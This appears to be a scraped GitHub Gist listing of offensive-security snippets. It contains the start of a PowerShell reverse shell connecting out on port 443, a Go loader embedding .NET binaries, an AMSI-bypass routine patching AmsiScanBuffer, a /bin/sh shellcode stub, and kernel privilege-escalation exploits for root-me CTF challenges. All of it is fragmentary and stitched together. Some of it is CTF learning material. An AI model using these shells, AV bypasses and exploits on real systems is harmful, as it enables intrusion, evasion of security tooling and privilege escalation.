Skip to content

Instantly share code, notes, and snippets.

# Associated blog post :
function Get-ADAllUserGroupMembership {
Recursively retrieve all the groups where a specified group belongs to.
PS> Get-ADAllUserGroupMembership -Server -GroupName custom_admin
HopHouse / powershell-reverseshell.ps1
Last active August 19, 2020 07:56
Reverse shell in Powershell retrieved on the Internet.
$socket = new-object System.Net.Sockets.TcpClient('', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
HopHouse / go-sharp-loader.go
Last active August 5, 2020 22:15 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
Example Go program with multiple .NET Binaries embedded
This requires packr ( and the utility. Install with:
$ GOOS=windows go get -u
Place all your EXEs are in a "binaries" folder
* Took from
#include "stdafx.h"
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
using namespace std;
public static string run()
IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll
if (dllHandle == null) return "error";
//Get the AmsiScanBuffer function address
IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer");
if (AmsiScanbufferAddr == null) return "error";
IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection
HopHouse /
Last active July 9, 2019 19:56
Send Telegram noification after SSH connection
# Edit /etc/pam.d/sshd and put the following line:
# session optional /root/
DATE_EXEC="$(date "+%d %b %Y %H:%M")" #Collect date & time.
HopHouse / exploit.S
Last active July 31, 2018 13:02
.asciz "//bin/sh"
.word 0x00000000
.global _start
HopHouse / exploit.c
Last active January 2, 2018 15:25
CH3 root-me - 64 Bits Race Condition
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <fcntl.h>
void get_shell() {
HopHouse / exploit.c
Last active January 2, 2018 15:29
CH2 root-me
* Rouvès Quentin -
* Exploit NULL Dereference kernel module
* Exec: gcc exploit.c -static -m32 -o exploit
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
HopHouse / ch1.c
Last active November 13, 2017 14:27
Ch1 root-me
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
// commit cred: c1070e80
// prepare kernel cred c10711f0